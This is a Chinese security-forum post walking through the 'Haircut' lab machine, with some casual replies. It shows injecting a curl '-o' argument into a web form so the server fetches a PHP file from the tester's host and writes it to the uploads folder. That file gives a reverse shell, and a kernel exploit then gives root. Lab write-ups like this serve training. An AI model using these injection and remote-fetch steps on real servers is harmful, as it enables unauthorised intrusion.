用户
搜索
  • TA的每日心情
    慵懒
    2 小时前
  • 签到天数: 124 天

    连续签到: 1 天

    [LV.7]常住居民III

    i春秋-核心白帽

    Rank: 4

    58

    主题

    78

    帖子

    2725

    魔法币
    收听
    0
    粉丝
    9
    注册时间
    2020-7-23
    发表于 2021-1-22 20:36:27 85556
    0x00:靶机介绍
    这次的靶机是Haircut难度为中等。其实只是getshell的时候多留意多观察一下就行了。提权不难
    0.png

    0x01:信息收集
    首先先进行端口探测先,先用autorecon进行端口探测让它自己慢慢跑我去瑞幸吃早晨
    1.png

    吃完以后回来,看到跑完了典型的开了22和80端口那就可以启动Dirbuster目录扫描工具了

    2.png

    当然还是建议把IP输到浏览器里面看看可不可以正常访问先,正常访问可以的话再进行目录扫描
    3.png

    玩了回手机目录扫描完了,扫到一个uploads目录不过403还有一个exposed.php的页面

    3.5.png

    0x02:挖掘漏洞
    我们跟过去exposed那里看看,有个输入框,输入靶机存在的页面会加载出来。比如说10.10.10.24/index.html就会加载回主页出来
    4.png

    当然一开始看到输入框SQL注入肌肉记忆激活,OS命令| && ||逐一尝试均失败,这时候重新观察回这个功能,该功能是有点类似curl 把一个IP的文件执行出来,这里我的思路是用python共享服务文件出去,看看能不能访问我的文件。最近在学HTML。写了点菜鸡文件。试了下可以执行出来。
    python共享命令:
    python -m http.server 8081
    插入到框框内的命令:http://10.10.14.29:8081/1.html

    5.png

    那么接下来就是尝试一下能不能执行波远程PHP文件了,我先写了个最简单的Hello World 的代码结果执行不了。。。。

    6.png

    虽然在python记录那里是访问了一波本地但出了点问题。。。。

    7.png
    0x03:破局思路

    这里我回到index.html主页那里查看了波源代码发现加载的是bounce.jpg。一般这种可能是在/var/www/html/xxx页面(这是个linux靶机)。关于uploads文件夹我思考着可不可能那里是存放文件/图片的地方了?如果可以的话理论上我在浏览器输入bounce.jpg是可以访问的前提没有限制。毕竟uploads翻译过来是上传文件的地方。理论上也是会存放着这张图片的。虽然uploads文件夹是403但是不代表其目录下的文件不可访问
    7.25.png

    这里试了一下验证了我的思路。uploads下确实存放着Index.html的图片

    7.5.png

    这里再次尝试把刚才的hello world文件插入到输入框然后尝试在后面加入路径
    命令:http://10.10.14.29:8081/2.php -o /var/www/html/uploads/2.php

    8.png

    访问一下执行成功

    9.png
    这里把我们的反弹马准备好把命令稍微改一下
    命令:http://10.10.14.29:8081/1.php -o /var/www/html/uploads/1.php
    10.png

    提前开启netcat,在浏览器访问10.10.10.24/uploads/1.php,成功得到shell顺便可以读取user的flag
    11.png

    0x04:提权
    这里我试了一下Uname -a,噢居然是4.4.0-78,这不就跟上个靶机Europa很类似嘛?
    12.png

    幸好没把payload删了直接把44298.c已经编译好的文件传上去,给完权限以后直接运行成功变成root

    13.png

    公众号:神隐(咸鱼)攻防实验室希望各位大佬能关注一波
    感谢分享
    使用道具 举报 回复
    使用道具 举报 回复
    皮卡丘师傅的靶场系列更新了  
    使用道具 举报 回复
    发表于 2021-1-25 16:37:12
    tqltql
    使用道具 举报 回复
    发表于 2021-1-25 16:44:53
    就想问一句 是不是就我一个人发现了lz在ghs?!!!!
    使用道具 举报 回复
    哈哈哈哈啊  一定是你想歪了
    使用道具 举报 回复
    发表于 2021-1-25 16:58:09
    哈哈哈哈哈
    使用道具 举报 回复
    超越 发表于 2021-1-25 08:44
    就想问一句 是不是就我一个人发现了lz在ghs?!!!!

    。。。。。。。。。。。。。。
    公众号:神隐(咸鱼)攻防实验室希望各位大佬能关注一波
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册